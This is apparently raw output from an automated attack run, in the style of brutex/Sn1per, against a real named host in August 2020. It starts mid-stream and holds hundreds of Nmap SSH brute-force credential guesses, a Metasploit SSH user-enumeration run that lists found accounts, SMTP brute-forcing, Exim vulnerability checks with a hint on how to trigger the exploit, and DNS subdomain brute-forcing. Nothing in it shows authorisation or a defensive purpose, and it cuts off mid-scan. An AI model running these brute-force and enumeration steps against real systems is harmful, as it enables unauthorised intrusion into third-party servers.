NSE: [ssh-brute] Trying username/password pair: guest: NSE: [ssh-brute] Trying username/password pair: user: NSE: [ssh-brute] Trying username/password pair: web: NSE: [ssh-brute] Trying username/password pair: test: NSE: [ssh-brute] Trying username/password pair: root:123456 NSE: [ssh-brute] Trying username/password pair: admin:123456 NSE: [ssh-brute] Trying username/password pair: administrator:123456 NSE: [ssh-brute] Trying username/password pair: webadmin:123456 NSE: [ssh-brute] Trying username/password pair: sysadmin:123456 NSE: [ssh-brute] Trying username/password pair: netadmin:123456 NSE: [ssh-brute] Trying username/password pair: guest:123456 NSE: [ssh-brute] Trying username/password pair: user:123456 NSE: [ssh-brute] Trying username/password pair: web:123456 NSE: [ssh-brute] Trying username/password pair: test:123456 NSE: [ssh-brute] Trying username/password pair: root:12345 NSE: [ssh-brute] Trying username/password pair: admin:12345 NSE: [ssh-brute] Trying username/password pair: administrator:12345 NSE: [ssh-brute] Trying username/password pair: webadmin:12345 NSE: [ssh-brute] Trying username/password pair: sysadmin:12345 NSE: [ssh-brute] Trying username/password pair: netadmin:12345 NSE: [ssh-brute] Trying username/password pair: guest:12345 NSE: [ssh-brute] Trying username/password pair: user:12345 NSE: [ssh-brute] Trying username/password pair: web:12345 NSE: [ssh-brute] Trying username/password pair: test:12345 NSE: [ssh-brute] Trying username/password pair: root:123456789 NSE: [ssh-brute] Trying username/password pair: admin:123456789 NSE: [ssh-brute] Trying username/password pair: administrator:123456789 NSE: [ssh-brute] Trying username/password pair: webadmin:123456789 NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789 NSE: [ssh-brute] Trying username/password pair: netadmin:123456789 NSE: [ssh-brute] Trying username/password pair: guest:123456789 NSE: [ssh-brute] Trying username/password pair: user:123456789 NSE: [ssh-brute] Trying username/password pair: web:123456789 NSE: [ssh-brute] Trying username/password pair: test:123456789 NSE: [ssh-brute] Trying username/password pair: root:password NSE: [ssh-brute] Trying username/password pair: admin:password NSE: [ssh-brute] Trying username/password pair: administrator:password NSE: [ssh-brute] Trying username/password pair: webadmin:password NSE: [ssh-brute] Trying username/password pair: sysadmin:password NSE: [ssh-brute] Trying username/password pair: netadmin:password NSE: [ssh-brute] Trying username/password pair: guest:password NSE: [ssh-brute] Trying username/password pair: user:password NSE: [ssh-brute] Trying username/password pair: web:password NSE: [ssh-brute] Trying username/password pair: test:password NSE: [ssh-brute] Trying username/password pair: root:iloveyou NSE: [ssh-brute] Trying username/password pair: admin:iloveyou NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou NSE: [ssh-brute] Trying username/password pair: guest:iloveyou NSE: [ssh-brute] Trying username/password pair: user:iloveyou NSE: [ssh-brute] Trying username/password pair: web:iloveyou NSE: [ssh-brute] Trying username/password pair: test:iloveyou NSE: [ssh-brute] Trying username/password pair: root:princess NSE: [ssh-brute] Trying username/password pair: admin:princess NSE: [ssh-brute] Trying username/password pair: administrator:princess NSE: [ssh-brute] Trying username/password pair: webadmin:princess NSE: [ssh-brute] Trying username/password pair: sysadmin:princess NSE: [ssh-brute] Trying username/password pair: netadmin:princess NSE: [ssh-brute] Trying username/password pair: guest:princess NSE: [ssh-brute] Trying username/password pair: user:princess NSE: [ssh-brute] Trying username/password pair: web:princess NSE: [ssh-brute] Trying username/password pair: test:princess NSE: [ssh-brute] Trying username/password pair: root:12345678 NSE: [ssh-brute] Trying username/password pair: admin:12345678 NSE: [ssh-brute] Trying username/password pair: administrator:12345678 NSE: [ssh-brute] Trying username/password pair: webadmin:12345678 NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678 NSE: [ssh-brute] Trying username/password pair: netadmin:12345678 NSE: [ssh-brute] Trying username/password pair: guest:12345678 NSE: [ssh-brute] Trying username/password pair: user:12345678 NSE: [ssh-brute] Trying username/password pair: web:12345678 NSE: [ssh-brute] Trying username/password pair: test:12345678 NSE: [ssh-brute] Trying username/password pair: root:1234567 NSE: [ssh-brute] Trying username/password pair: admin:1234567 NSE: [ssh-brute] Trying username/password pair: administrator:1234567 NSE: [ssh-brute] Trying username/password pair: webadmin:1234567 NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567 NSE: [ssh-brute] Trying username/password pair: netadmin:1234567 NSE: [ssh-brute] Trying username/password pair: guest:1234567 NSE: [ssh-brute] Trying username/password pair: user:1234567 NSE: [ssh-brute] Trying username/password pair: web:1234567 NSE: [ssh-brute] Trying username/password pair: test:1234567 NSE: [ssh-brute] Trying username/password pair: root:abc123 NSE: [ssh-brute] Trying username/password pair: admin:abc123 NSE: [ssh-brute] Trying username/password pair: administrator:abc123 NSE: [ssh-brute] Trying username/password pair: webadmin:abc123 NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123 NSE: [ssh-brute] Trying username/password pair: netadmin:abc123 NSE: [ssh-brute] Trying username/password pair: guest:abc123 NSE: [ssh-brute] Trying username/password pair: user:abc123 NSE: [ssh-brute] Trying username/password pair: web:abc123 NSE: [ssh-brute] Trying username/password pair: test:abc123 NSE: [ssh-brute] Trying username/password pair: root:nicole NSE: [ssh-brute] Trying username/password pair: admin:nicole NSE: [ssh-brute] Trying username/password pair: administrator:nicole NSE: [ssh-brute] Trying username/password pair: webadmin:nicole NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole NSE: [ssh-brute] Trying username/password pair: netadmin:nicole NSE: [ssh-brute] Trying username/password pair: guest:nicole NSE: [ssh-brute] Trying username/password pair: user:nicole NSE: [ssh-brute] Trying username/password pair: web:nicole NSE: [ssh-brute] Trying username/password pair: test:nicole NSE: [ssh-brute] Trying username/password pair: root:daniel NSE: [ssh-brute] Trying username/password pair: admin:daniel NSE: [ssh-brute] Trying username/password pair: administrator:daniel NSE: [ssh-brute] Trying username/password pair: webadmin:daniel NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel NSE: [ssh-brute] Trying username/password pair: netadmin:daniel NSE: [ssh-brute] Trying username/password pair: guest:daniel NSE: [ssh-brute] Trying username/password pair: user:daniel NSE: [ssh-brute] Trying username/password pair: web:daniel NSE: [ssh-brute] Trying username/password pair: test:daniel NSE: [ssh-brute] Trying username/password pair: root:monkey NSE: [ssh-brute] Trying username/password pair: admin:monkey NSE: [ssh-brute] Trying username/password pair: administrator:monkey NSE: [ssh-brute] Trying username/password pair: webadmin:monkey NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey NSE: [ssh-brute] Trying username/password pair: netadmin:monkey NSE: [ssh-brute] Trying username/password pair: guest:monkey NSE: [ssh-brute] Trying username/password pair: user:monkey NSE: [ssh-brute] Trying username/password pair: web:monkey NSE: [ssh-brute] Trying username/password pair: test:monkey NSE: [ssh-brute] Trying username/password pair: root:babygirl NSE: [ssh-brute] Trying username/password pair: admin:babygirl NSE: [ssh-brute] Trying username/password pair: administrator:babygirl NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl NSE: [ssh-brute] Trying username/password pair: guest:babygirl NSE: [ssh-brute] Trying username/password pair: user:babygirl NSE: [ssh-brute] Trying username/password pair: web:babygirl NSE: [ssh-brute] Trying username/password pair: test:babygirl NSE: [ssh-brute] Trying username/password pair: root:qwerty NSE: [ssh-brute] Trying username/password pair: admin:qwerty NSE: [ssh-brute] Trying username/password pair: administrator:qwerty NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty NSE: [ssh-brute] Trying username/password pair: guest:qwerty NSE: [ssh-brute] Trying username/password pair: user:qwerty NSE: [ssh-brute] Trying username/password pair: web:qwerty NSE: [ssh-brute] Trying username/password pair: test:qwerty NSE: [ssh-brute] Trying username/password pair: root:lovely NSE: [ssh-brute] Trying username/password pair: admin:lovely NSE: [ssh-brute] Trying username/password pair: administrator:lovely NSE: [ssh-brute] Trying username/password pair: webadmin:lovely NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely NSE: [ssh-brute] Trying username/password pair: netadmin:lovely NSE: [ssh-brute] Trying username/password pair: guest:lovely NSE: [ssh-brute] Trying username/password pair: user:lovely NSE: [ssh-brute] Trying username/password pair: web:lovely NSE: [ssh-brute] Trying username/password pair: test:lovely NSE: [ssh-brute] Trying username/password pair: root:654321 NSE: [ssh-brute] Trying username/password pair: admin:654321 NSE: [ssh-brute] Trying username/password pair: administrator:654321 NSE: [ssh-brute] Trying username/password pair: webadmin:654321 NSE: [ssh-brute] Trying username/password pair: sysadmin:654321 NSE: [ssh-brute] Trying username/password pair: netadmin:654321 NSE: [ssh-brute] Trying username/password pair: guest:654321 NSE: [ssh-brute] Trying username/password pair: user:654321 NSE: [ssh-brute] Trying username/password pair: web:654321 NSE: [ssh-brute] Trying username/password pair: test:654321 NSE: [ssh-brute] Trying username/password pair: root:michael NSE: [ssh-brute] Trying username/password pair: admin:michael NSE: [ssh-brute] Trying username/password pair: administrator:michael NSE: [ssh-brute] Trying username/password pair: webadmin:michael NSE: [ssh-brute] Trying username/password pair: sysadmin:michael NSE: [ssh-brute] Trying username/password pair: netadmin:michael NSE: [ssh-brute] Trying username/password pair: guest:michael NSE: [ssh-brute] Trying username/password pair: user:michael NSE: [ssh-brute] Trying username/password pair: web:michael NSE: [ssh-brute] Trying username/password pair: test:michael NSE: [ssh-brute] Trying username/password pair: root:jessica NSE: [ssh-brute] Trying username/password pair: admin:jessica NSE: [ssh-brute] Trying username/password pair: administrator:jessica NSE: [ssh-brute] Trying username/password pair: webadmin:jessica NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica NSE: [ssh-brute] Trying username/password pair: netadmin:jessica NSE: [ssh-brute] Trying username/password pair: guest:jessica NSE: [ssh-brute] Trying username/password pair: user:jessica NSE: [ssh-brute] Trying username/password pair: web:jessica NSE: [ssh-brute] Trying username/password pair: test:jessica NSE: [ssh-brute] Trying username/password pair: root:111111 NSE: [ssh-brute] Trying username/password pair: admin:111111 NSE: [ssh-brute] Trying username/password pair: administrator:111111 NSE: [ssh-brute] Trying username/password pair: webadmin:111111 NSE: [ssh-brute] Trying username/password pair: sysadmin:111111 NSE: [ssh-brute] Trying username/password pair: netadmin:111111 NSE: [ssh-brute] Trying username/password pair: guest:111111 NSE: [ssh-brute] Trying username/password pair: user:111111 NSE: [ssh-brute] Trying username/password pair: web:111111 NSE: [ssh-brute] Trying username/password pair: test:111111 NSE: [ssh-brute] Trying username/password pair: root:ashley NSE: [ssh-brute] Trying username/password pair: admin:ashley NSE: [ssh-brute] Trying username/password pair: administrator:ashley NSE: [ssh-brute] Trying username/password pair: webadmin:ashley NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley NSE: [ssh-brute] Trying username/password pair: netadmin:ashley NSE: [ssh-brute] Trying username/password pair: guest:ashley NSE: [ssh-brute] Trying username/password pair: user:ashley NSE: [ssh-brute] Trying username/password pair: web:ashley NSE: [ssh-brute] Trying username/password pair: test:ashley NSE: [ssh-brute] Trying username/password pair: root:000000 NSE: [ssh-brute] Trying username/password pair: admin:000000 NSE: [ssh-brute] Trying username/password pair: administrator:000000 NSE: [ssh-brute] Trying username/password pair: webadmin:000000 NSE: [ssh-brute] Trying username/password pair: sysadmin:000000 NSE: [ssh-brute] Trying username/password pair: netadmin:000000 NSE: [ssh-brute] Trying username/password pair: guest:000000 NSE: [ssh-brute] Trying username/password pair: user:000000 NSE: [ssh-brute] Trying username/password pair: web:000000 NSE: [ssh-brute] Trying username/password pair: test:000000 NSE: [ssh-brute] Trying username/password pair: root:iloveu NSE: [ssh-brute] Trying username/password pair: admin:iloveu NSE: [ssh-brute] Trying username/password pair: administrator:iloveu NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu NSE: [ssh-brute] Trying username/password pair: guest:iloveu NSE: [ssh-brute] Trying username/password pair: user:iloveu NSE: [ssh-brute] Trying username/password pair: web:iloveu NSE: [ssh-brute] Trying username/password pair: test:iloveu NSE: [ssh-brute] Trying username/password pair: root:michelle NSE: [ssh-brute] Trying username/password pair: admin:michelle NSE: [ssh-brute] Trying username/password pair: administrator:michelle NSE: [ssh-brute] Trying username/password pair: webadmin:michelle NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle NSE: [ssh-brute] Trying username/password pair: netadmin:michelle NSE: [ssh-brute] Trying username/password pair: guest:michelle NSE: [ssh-brute] Trying username/password pair: user:michelle NSE: [ssh-brute] Trying username/password pair: web:michelle NSE: [ssh-brute] Trying username/password pair: test:michelle NSE: [ssh-brute] Trying username/password pair: root:tigger NSE: [ssh-brute] Trying username/password pair: admin:tigger NSE: [ssh-brute] Trying username/password pair: administrator:tigger NSE: [ssh-brute] Trying username/password pair: webadmin:tigger NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger NSE: [ssh-brute] Trying username/password pair: netadmin:tigger NSE: [ssh-brute] Trying username/password pair: guest:tigger NSE: [ssh-brute] Trying username/password pair: user:tigger NSE: [ssh-brute] Trying username/password pair: web:tigger NSE: [ssh-brute] Trying username/password pair: test:tigger NSE: [ssh-brute] Trying username/password pair: root:sunshine NSE: [ssh-brute] Trying username/password pair: admin:sunshine NSE: [ssh-brute] Trying username/password pair: administrator:sunshine NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine NSE: [ssh-brute] Trying username/password pair: guest:sunshine NSE: [ssh-brute] Trying username/password pair: user:sunshine NSE: [ssh-brute] Trying username/password pair: web:sunshine NSE: [ssh-brute] Trying username/password pair: test:sunshine NSE: [ssh-brute] Trying username/password pair: root:chocolate NSE: [ssh-brute] Trying username/password pair: admin:chocolate NSE: [ssh-brute] Trying username/password pair: administrator:chocolate NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate NSE: [ssh-brute] Trying username/password pair: guest:chocolate NSE: [ssh-brute] Trying username/password pair: user:chocolate NSE: [ssh-brute] Trying username/password pair: web:chocolate NSE: [ssh-brute] Trying username/password pair: test:chocolate NSE: [ssh-brute] Trying username/password pair: root:password1 NSE: [ssh-brute] Trying username/password pair: admin:password1 NSE: [ssh-brute] Trying username/password pair: administrator:password1 NSE: [ssh-brute] Trying username/password pair: webadmin:password1 NSE: [ssh-brute] Trying username/password pair: sysadmin:password1 NSE: [ssh-brute] Trying username/password pair: netadmin:password1 NSE: [ssh-brute] Trying username/password pair: guest:password1 NSE: [ssh-brute] Trying username/password pair: user:password1 NSE: [ssh-brute] Trying username/password pair: web:password1 NSE: [ssh-brute] Trying username/password pair: test:password1 NSE: [ssh-brute] Trying username/password pair: root:soccer NSE: [ssh-brute] Trying username/password pair: admin:soccer NSE: [ssh-brute] Trying username/password pair: administrator:soccer NSE: [ssh-brute] Trying username/password pair: webadmin:soccer NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer NSE: [ssh-brute] Trying username/password pair: netadmin:soccer NSE: [ssh-brute] Trying username/password pair: guest:soccer NSE: [ssh-brute] Trying username/password pair: user:soccer NSE: [ssh-brute] Trying username/password pair: web:soccer NSE: [ssh-brute] Trying username/password pair: test:soccer NSE: [ssh-brute] Trying username/password pair: root:anthony NSE: [ssh-brute] Trying username/password pair: admin:anthony NSE: [ssh-brute] Trying username/password pair: administrator:anthony NSE: [ssh-brute] Trying username/password pair: webadmin:anthony NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony NSE: [ssh-brute] Trying username/password pair: netadmin:anthony NSE: [ssh-brute] Trying username/password pair: guest:anthony NSE: [ssh-brute] Trying username/password pair: user:anthony NSE: [ssh-brute] Trying username/password pair: web:anthony NSE: [ssh-brute] Trying username/password pair: test:anthony NSE: [ssh-brute] Trying username/password pair: root:friends NSE: [ssh-brute] Trying username/password pair: admin:friends NSE: [ssh-brute] Trying username/password pair: administrator:friends NSE: [ssh-brute] Trying username/password pair: webadmin:friends NSE: [ssh-brute] Trying username/password pair: sysadmin:friends NSE: [ssh-brute] Trying username/password pair: netadmin:friends NSE: [ssh-brute] Trying username/password pair: guest:friends NSE: [ssh-brute] Trying username/password pair: user:friends NSE: [ssh-brute] Trying username/password pair: web:friends NSE: [ssh-brute] Trying username/password pair: test:friends NSE: [ssh-brute] Trying username/password pair: root:purple NSE: [ssh-brute] Trying username/password pair: admin:purple NSE: [ssh-brute] Trying username/password pair: administrator:purple NSE: [ssh-brute] Trying username/password pair: webadmin:purple NSE: [ssh-brute] Trying username/password pair: sysadmin:purple NSE: [ssh-brute] Trying username/password pair: netadmin:purple NSE: [ssh-brute] Trying username/password pair: guest:purple NSE: [ssh-brute] Trying username/password pair: user:purple NSE: [ssh-brute] Trying username/password pair: web:purple NSE: [ssh-brute] Trying username/password pair: test:purple NSE: [ssh-brute] Trying username/password pair: root:angel NSE: [ssh-brute] Trying username/password pair: admin:angel NSE: [ssh-brute] Trying username/password pair: administrator:angel NSE: [ssh-brute] Trying username/password pair: webadmin:angel NSE: [ssh-brute] Trying username/password pair: sysadmin:angel NSE: [ssh-brute] Trying username/password pair: netadmin:angel NSE: [ssh-brute] Trying username/password pair: guest:angel NSE: [ssh-brute] Trying username/password pair: user:angel NSE: [ssh-brute] Trying username/password pair: web:angel NSE: [ssh-brute] Trying username/password pair: test:angel NSE: [ssh-brute] Trying username/password pair: root:butterfly NSE: [ssh-brute] Trying username/password pair: admin:butterfly NSE: [ssh-brute] Trying username/password pair: administrator:butterfly NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly NSE: [ssh-brute] Trying username/password pair: guest:butterfly NSE: [ssh-brute] Trying username/password pair: user:butterfly NSE: [ssh-brute] Trying username/password pair: web:butterfly NSE: [ssh-brute] Trying username/password pair: test:butterfly NSE: [ssh-brute] Trying username/password pair: root:jordan NSE: [ssh-brute] Trying username/password pair: admin:jordan NSE: [ssh-brute] Trying username/password pair: administrator:jordan NSE: [ssh-brute] Trying username/password pair: webadmin:jordan NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan NSE: [ssh-brute] Trying username/password pair: netadmin:jordan NSE: [ssh-brute] Trying username/password pair: guest:jordan NSE: [ssh-brute] Trying username/password pair: user:jordan NSE: [ssh-brute] Trying username/password pair: web:jordan NSE: [ssh-brute] Trying username/password pair: test:jordan NSE: [ssh-brute] Trying username/password pair: root:fuckyou NSE: [ssh-brute] Trying username/password pair: admin:fuckyou NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou NSE: [ssh-brute] Trying username/password pair: guest:fuckyou NSE: [ssh-brute] Trying username/password pair: user:fuckyou NSE: [ssh-brute] Trying username/password pair: web:fuckyou NSE: [ssh-brute] Trying username/password pair: test:fuckyou NSE: [ssh-brute] Trying username/password pair: root:123123 NSE: [ssh-brute] Trying username/password pair: admin:123123 NSE: [ssh-brute] Trying username/password pair: administrator:123123 NSE: [ssh-brute] Trying username/password pair: webadmin:123123 NSE: [ssh-brute] Trying username/password pair: sysadmin:123123 NSE: [ssh-brute] Trying username/password pair: netadmin:123123 NSE: [ssh-brute] usernames: Time limit 3m00s exceeded. NSE: [ssh-brute] usernames: Time limit 3m00s exceeded. NSE: [ssh-brute] passwords: Time limit 3m00s exceeded. Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.24s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) | ssh-auth-methods: | Supported authentication methods: | publickey |_ password | ssh-brute: | Accounts: No valid accounts found |_ Statistics: Performed 376 guesses in 183 seconds, average tps: 2.4 | ssh-hostkey: | 2048 89:e2:fc:31:f3:d0:4d:b0:17:85:f9:83:ef:c3:cf:a4 (RSA) |_ 256 a9:72:e2:82:ba:05:fc:44:19:1d:9a:c3:15:c0:89:28 (ECDSA) | ssh-publickey-acceptance: |_ Accepted Public Keys: No public keys accepted |_ssh-run: Failed to specify credentials and command to run. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.8 - 3.11 (94%) No exact OS matches for host (test conditions non-ideal). Network Distance: 11 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 93.17 ms 10.203.4.1 2 93.54 ms vlan119.as16.lax1.us.m247.com (185.242.5.113) 3 ... 4 93.86 ms 37.120.220.20 5 93.82 ms las-b21-link.telia.net (195.12.254.138) 6 238.56 ms ae-2-3204.edge7.Amsterdam1.Level3.net (4.69.162.181) 7 236.62 ms NOVOSERVE-B.edge7.Amsterdam1.Level3.net (213.19.200.70) 8 ... 9 237.25 ms adm-b6-link.telia.net (62.115.116.125) 10 238.14 ms novoserve-svc069390-ic354347.c.telia.net (62.115.188.167) 11 239.08 ms tinytube.top (212.86.108.165) ##################################################################################################################################### USER_FILE => /usr/share/brutex/wordlists/simple-users.txt RHOSTS => 212.86.108.165 RHOST => 212.86.108.165 [*] 212.86.108.165:22 - SSH - Using malformed packet technique [*] 212.86.108.165:22 - SSH - Starting scan [+] 212.86.108.165:22 - SSH - User 'admin' found [+] 212.86.108.165:22 - SSH - User 'administrator' found [+] 212.86.108.165:22 - SSH - User 'anonymous' found [+] 212.86.108.165:22 - SSH - User 'backup' found [+] 212.86.108.165:22 - SSH - User 'bee' found [+] 212.86.108.165:22 - SSH - User 'ftp' found [+] 212.86.108.165:22 - SSH - User 'guest' found [+] 212.86.108.165:22 - SSH - User 'GUEST' found [+] 212.86.108.165:22 - SSH - User 'info' found [+] 212.86.108.165:22 - SSH - User 'mail' found [+] 212.86.108.165:22 - SSH - User 'mailadmin' found [+] 212.86.108.165:22 - SSH - User 'msfadmin' found [+] 212.86.108.165:22 - SSH - User 'mysql' found [+] 212.86.108.165:22 - SSH - User 'nobody' found [+] 212.86.108.165:22 - SSH - User 'oracle' found [+] 212.86.108.165:22 - SSH - User 'owaspbwa' found [+] 212.86.108.165:22 - SSH - User 'postfix' found [+] 212.86.108.165:22 - SSH - User 'postgres' found [+] 212.86.108.165:22 - SSH - User 'private' found [+] 212.86.108.165:22 - SSH - User 'proftpd' found [+] 212.86.108.165:22 - SSH - User 'public' found [+] 212.86.108.165:22 - SSH - User 'root' found [+] 212.86.108.165:22 - SSH - User 'superadmin' found [+] 212.86.108.165:22 - SSH - User 'support' found [+] 212.86.108.165:22 - SSH - User 'sys' found [+] 212.86.108.165:22 - SSH - User 'system' found [+] 212.86.108.165:22 - SSH - User 'systemadmin' found [+] 212.86.108.165:22 - SSH - User 'systemadministrator' found [+] 212.86.108.165:22 - SSH - User 'test' found [+] 212.86.108.165:22 - SSH - User 'tomcat' found [+] 212.86.108.165:22 - SSH - User 'user' found [+] 212.86.108.165:22 - SSH - User 'webmaster' found [+] 212.86.108.165:22 - SSH - User 'www-data' found [+] 212.86.108.165:22 - SSH - User 'Fortimanager_Access' found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 07:39 EDT NSE: [smtp-brute] usernames: Time limit 3m00s exceeded. NSE: [smtp-brute] usernames: Time limit 3m00s exceeded. NSE: [smtp-brute] passwords: Time limit 3m00s exceeded. Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.23s latency). PORT STATE SERVICE VERSION 25/tcp open smtp Exim smtpd 4.89 | smtp-brute: | Accounts: No valid accounts found |_ Statistics: Performed 1535 guesses in 181 seconds, average tps: 8.1 | smtp-commands: tinytube.top Hello tinytube.top [185.242.5.119], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP | smtp-enum-users: |_ Method RCPT returned a unhandled status code. |_smtp-open-relay: SMTP RSET: failed to receive data: connection closed | smtp-vuln-cve2010-4344: | Exim version: 4.89 | Exim heap overflow vulnerability (CVE-2010-4344): | Exim (CVE-2010-4344): NOT VULNERABLE | Exim privileges escalation vulnerability (CVE-2010-4345): | Exim (CVE-2010-4345): NOT VULNERABLE |_ To confirm and exploit the vulnerabilities, run with --script-args='smtp-vuln-cve2010-4344.exploit' Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.16 (94%) No exact OS matches for host (test conditions non-ideal). Network Distance: 9 hops TRACEROUTE (using port 25/tcp) HOP RTT ADDRESS 1 94.44 ms 10.203.4.1 2 94.51 ms vlan119.as16.lax1.us.m247.com (185.242.5.113) 3 ... 4 94.55 ms te-1-2-0.bb1.nyc1.us.m247.com (77.243.185.18) 5 91.67 ms las-b21-link.telia.net (195.12.254.138) 6 238.62 ms ae-2-3204.edge7.Amsterdam1.Level3.net (4.69.162.181) 7 237.38 ms NOVOSERVE-B.edge7.Amsterdam1.Level3.net (213.19.200.70) 8 ... 9 234.17 ms tinytube.top (212.86.108.165) ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 07:44 EDT Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.24s latency). PORT STATE SERVICE VERSION 53/tcp open domain ISC BIND 9.10.3-P4 (Debian Linux) |_dns-fuzz: Server didn't response to our probe, can't fuzz | dns-nsec-enum: |_ No NSEC records found | dns-nsec3-enum: |_ DNSSEC NSEC3 not supported | dns-nsid: |_ bind.version: 9.10.3-P4-Debian Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 - 4.6 (94%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.16 (94%), HP P2000 G3 NAS device (93%), Linux 3.18 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 9 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | dns-brute: | DNS Brute-force hostnames: | mail.tinytube.top - 212.86.108.165 | www.tinytube.top - 212.86.108.165 | ftp.tinytube.top - 212.86.108.165 |_ smtp.tinytube.top - 212.86.108.165 TRACEROUTE (using port 53/tcp) HOP RTT ADDRESS 1 90.59 ms 10.203.4.1 2 90.64 ms vlan119.as16.lax1.us.m247.com (185.242.5.113) 3 ... 4 94.33 ms xe-2-3-0-0.bb2.lax1.us.m247.com (193.9.115.198) 5 94.36 ms las-b21-link.telia.net (195.12.254.138) 6 148.99 ms ash-bb2-link.telia.net (62.115.121.221) 7 236.84 ms prs-bb3-link.telia.net (62.115.112.243) 8 240.07 ms adm-bb3-link.telia.net (62.115.121.154) 9 238.44 ms tinytube.top (212.86.108.165) ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 07:45 EDT Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.24s latency). PORT STATE SERVICE VERSION 68/tcp closed dhcpc 68/udp closed dhcpc Too many fingerprints match this host to give specific OS details Network Distance: 9 hops TRACEROUTE (using port 68/tcp) HOP RTT ADDRESS 1 93.01 ms 10.203.4.1 2 93.40 ms vlan119.as16.lax1.us.m247.com (185.242.5.113) 3 ... 4 93.58 ms 37.120.220.20 5 93.56 ms las-b21-link.telia.net (195.12.254.138) 6 150.07 ms ash-bb2-link.telia.net (62.115.121.221) 7 236.97 ms prs-bb3-link.telia.net (62.115.112.243) 8 236.79 ms adm-bb4-link.telia.net (213.155.136.167) 9 231.65 ms tinytube.top (212.86.108.165) ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 07:45 EDT Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.24s latency). PORT STATE SERVICE VERSION 69/tcp closed tftp 69/udp closed tftp Too many fingerprints match this host to give specific OS details Network Distance: 9 hops TRACEROUTE (using port 69/tcp) HOP RTT ADDRESS 1 92.51 ms 10.203.4.1 2 103.48 ms vlan119.as16.lax1.us.m247.com (185.242.5.113) 3 ... 4 92.91 ms te-1-2-0.bb1.nyc1.us.m247.com (77.243.185.18) 5 93.70 ms las-b21-link.telia.net (195.12.254.138) 6 252.52 ms ae-2-3204.edge7.Amsterdam1.Level3.net (4.69.162.181) 7 240.38 ms prs-bb4-link.telia.net (62.115.122.158) 8 238.99 ms adm-bb4-link.telia.net (213.155.136.167) 9 236.30 ms tinytube.top (212.86.108.165) ##################################################################################################################################### wig - WebApp Information Gatherer Scanning http://212.86.108.165... _________________ SITE INFO __________________ IP Title 